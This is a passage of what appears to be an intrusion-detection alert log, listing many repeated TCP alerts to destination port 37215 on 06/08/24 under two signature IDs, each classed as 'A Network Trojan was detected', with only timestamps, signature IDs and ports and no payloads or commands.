          Timestamp:06/08/24-15:05:24.266288
          SID:2829579
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542555
          SID:2829579
          Source Port:56664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264181
          SID:2835222
          Source Port:37284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.064426
          SID:2835222
          Source Port:34240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449410
          SID:2829579
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067878
          SID:2829579
          Source Port:37292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150537
          SID:2829579
          Source Port:37830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707225
          SID:2829579
          Source Port:32912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894861
          SID:2829579
          Source Port:53868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353768
          SID:2835222
          Source Port:53044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087541
          SID:2835222
          Source Port:60622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555227
          SID:2835222
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241748
          SID:2829579
          Source Port:35988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663715
          SID:2829579
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547990
          SID:2829579
          Source Port:57736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078894
          SID:2829579
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161030
          SID:2835222
          Source Port:55608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159007
          SID:2835222
          Source Port:41236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806781
          SID:2835222
          Source Port:40112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240532
          SID:2835222
          Source Port:44310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176439
          SID:2835222
          Source Port:34884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159406
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731680
          SID:2835222
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175717
          SID:2835222
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461781
          SID:2835222
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747201
          SID:2835222
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911626
          SID:2829579
          Source Port:55020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740375
          SID:2835222
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274707
          SID:2829579
          Source Port:55910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599422
          SID:2835222
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264893
          SID:2835222
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157565
          SID:2829579
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811551
          SID:2829579
          Source Port:56928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512757
          SID:2835222
          Source Port:54616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745929
          SID:2829579
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036206
          SID:2835222
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783527
          SID:2829579
          Source Port:55642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267813
          SID:2835222
          Source Port:57198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743686
          SID:2835222
          Source Port:41414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550864
          SID:2835222
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147788
          SID:2829579
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446861
          SID:2835222
          Source Port:49946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857677
          SID:2829579
          Source Port:60994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405758
          SID:2829579
          Source Port:60410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2835222
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897813
          SID:2829579
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895718
          SID:2835222
          Source Port:51792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729119
          SID:2835222
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512139
          SID:2829579
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099089
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467538
          SID:2835222
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037138
          SID:2829579
          Source Port:51970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110441
          SID:2829579
          Source Port:32802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040260
          SID:2829579
          Source Port:42098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044344
          SID:2835222
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793108
          SID:2835222
          Source Port:44406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165634
          SID:2829579
          Source Port:45870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746586
          SID:2829579
          Source Port:47786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465947
          SID:2829579
          Source Port:40230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405351
          SID:2835222
          Source Port:44490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892073
          SID:2829579
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547185
          SID:2829579
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2835222
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353655
          SID:2835222
          Source Port:36588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161413
          SID:2835222
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2835222
          Source Port:44836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672787
          SID:2835222
          Source Port:60718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159819
          SID:2829579
          Source Port:32932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511055
          SID:2829579
          Source Port:48846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470567
          SID:2829579
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808910
          SID:2829579
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261081
          SID:2835222
          Source Port:57628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733213
          SID:2829579
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511363
          SID:2829579
          Source Port:44020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542741
          SID:2835222
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294900
          SID:2835222
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733251
          SID:2829579
          Source Port:33042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673549
          SID:2835222
          Source Port:43978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466066
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796379
          SID:2829579
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749127
          SID:2829579
          Source Port:36442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136065
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014678
          SID:2835222
          Source Port:38372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127910
          SID:2829579
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675209
          SID:2829579
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739199
          SID:2835222
          Source Port:49216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514191
          SID:2835222
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274799
          SID:2829579
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109103
          SID:2829579
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555407
          SID:2829579
          Source Port:41628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802410
          SID:2829579
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177780
          SID:2835222
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466845
          SID:2835222
          Source Port:54608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895718
          SID:2829579
          Source Port:38162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410750
          SID:2835222
          Source Port:39258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731247
          SID:2829579
          Source Port:34772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732038
          SID:2835222
          Source Port:56742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837544
          SID:2835222
          Source Port:48832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703980
          SID:2835222
          Source Port:38898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042630
          SID:2829579
          Source Port:38238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.455391
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512676
          SID:2829579
          Source Port:39626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888696
          SID:2829579
          Source Port:51780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406207
          SID:2835222
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2829579
          Source Port:37080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704208
          SID:2835222
          Source Port:57244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670623
          SID:2829579
          Source Port:37962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829571
          SID:2829579
          Source Port:49188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741854
          SID:2829579
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237906
          SID:2835222
          Source Port:34348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551911
          SID:2829579
          Source Port:50584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545717
          SID:2835222
          Source Port:50180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732405
          SID:2829579
          Source Port:51736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554537
          SID:2835222
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733497
          SID:2829579
          Source Port:43824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266117
          SID:2835222
          Source Port:44550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517369
          SID:2829579
          Source Port:57432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600997
          SID:2835222
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026082
          SID:2835222
          Source Port:60356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299547
          SID:2835222
          Source Port:35076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108010
          SID:2829579
          Source Port:47106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672315
          SID:2835222
          Source Port:42946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704948
          SID:2835222
          Source Port:44780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110775
          SID:2835222
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173271
          SID:2829579
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673546
          SID:2829579
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829292
          SID:2835222
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816416
          SID:2835222
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707436
          SID:2835222
          Source Port:55970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741765
          SID:2835222
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108964
          SID:2835222
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108334
          SID:2829579
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511617
          SID:2829579
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834234
          SID:2835222
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110180
          SID:2835222
          Source Port:47560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835661
          SID:2835222
          Source Port:51660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469156
          SID:2829579
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509713
          SID:2835222
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547442
          SID:2829579
          Source Port:60676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155364
          SID:2829579
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742073
          SID:2829579
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729246
          SID:2835222
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462963
          SID:2829579
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466536
          SID:2829579
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127542
          SID:2835222
          Source Port:43146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155962
          SID:2835222
          Source Port:57304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817465
          SID:2835222
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673858
          SID:2835222
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240468
          SID:2835222
          Source Port:58144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018392
          SID:2835222
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403742
          SID:2829579
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273433
          SID:2835222
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746339
          SID:2829579
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018302
          SID:2829579
          Source Port:54400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236500
          SID:2835222
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446803
          SID:2829579
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.145247
          SID:2835222
          Source Port:54458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510244
          SID:2835222
          Source Port:49514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466141
          SID:2835222
          Source Port:44330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705447
          SID:2829579
          Source Port:40444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671269
          SID:2829579
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465054
          SID:2829579
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448963
          SID:2829579
          Source Port:46266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175752
          SID:2835222
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014656
          SID:2829579
          Source Port:44046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150790
          SID:2829579
          Source Port:57482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354863
          SID:2835222
          Source Port:33356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895501
          SID:2829579
          Source Port:41580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894298
          SID:2829579
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449946
          SID:2835222
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893641
          SID:2835222
          Source Port:56942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041362
          SID:2829579
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128739
          SID:2829579
          Source Port:51232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517367
          SID:2835222
          Source Port:49830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063009
          SID:2829579
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732596
          SID:2835222
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554393
          SID:2835222
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787898
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741052
          SID:2829579
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175912
          SID:2829579
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070986
          SID:2835222
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896649
          SID:2835222
          Source Port:59198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837414
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513600
          SID:2829579
          Source Port:59094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155812
          SID:2835222
          Source Port:45496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016946
          SID:2829579
          Source Port:51680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603374
          SID:2829579
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862312
          SID:2835222
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295693
          SID:2829579
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173033
          SID:2835222
          Source Port:42840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042355
          SID:2835222
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732233
          SID:2829579
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407204
          SID:2835222
          Source Port:49984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035753
          SID:2835222
          Source Port:37612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058134
          SID:2835222
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395374
          SID:2829579
          Source Port:60660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179596
          SID:2829579
          Source Port:37222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887364
